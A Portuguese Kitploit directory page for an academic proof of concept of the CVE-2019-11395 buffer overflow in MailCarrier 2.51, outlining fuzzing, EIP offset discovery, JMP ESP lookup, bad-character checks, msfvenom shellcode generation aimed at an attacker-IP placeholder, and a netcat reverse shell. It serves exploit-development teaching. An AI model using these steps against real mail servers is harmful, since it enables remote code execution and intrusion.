Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/rafaelbicas/cve-2019-11395
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeFuzzingAprendizado e EducaçãoExploração de Binários
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

Prova de conceito com finalidade acadêmica para entender a vulnerabilidade de Buffer Overflow usando como pano de fundo o CVE-2019-11395

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-11395

Visão Geral

Esta Prova de Conceito (PoC) demonstra uma vulnerabilidade de Buffer Overflow no MailCarrier 2.51, permitindo que atacantes remotos executem código arbitrário por meio de uma string longa. A vulnerabilidade pode ser explorada usando os seguintes processos:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

O projeto tem como objetivo fornecer uma abordagem acadêmica para entender como o Buffer Overflow funciona.


⚠️ Avisos

Antes de executar qualquer teste, nunca use seu ambiente de produção para experimentos iniciais. Em vez disso, crie um ambiente de laboratório semelhante ao seu ambiente de produção para evitar quaisquer problemas ou consequências indesejadas.


🔧 Preparação

1. Descubra a Vulnerabilidade

  • Use a técnica de fuzzing para determinar o número aproximado de bytes necessários para quebrar o aplicativo.

2. Encontre o Offset

  • Assim que a falha ocorrer, use:
    msf-pattern_create -l <number_of_bytes>
    

Isso ajuda a determinar o Offset, que é o número exato de bytes necessários para sobrescrever o EIP.

  • Use o seguinte comando para confirmar o Offset
    msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
    

Isso identifica a contagem exata de bytes necessária para controlar o EIP.

3. Encontre uma Instrução JMP ou CALL

  • Localize uma instrução usando:
    JMP ESP
    CALL ESP
    

Usaremos esse endereço para redirecionar a execução. Tenha cuidado com ASLR, SafeSEH ou outros mecanismos de proteção.

4. Identifique os bad chars

  • Use a ferramenta Mona dentro do Immunity Debugger para verificar se há caracteres inválidos.

5. Gere o Shellcode

  • Crie o shellcode excluindo os caracteres inválidos:
    msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
    

6. Adicione NOPs

  • Insira instruções NOP (\x90) no payload para melhorar a estabilidade.

7. Estabeleça uma conexão

  • Use netcat (nc) para criar um reverse shell e conectar-se ao alvo.
Baixar ferramenta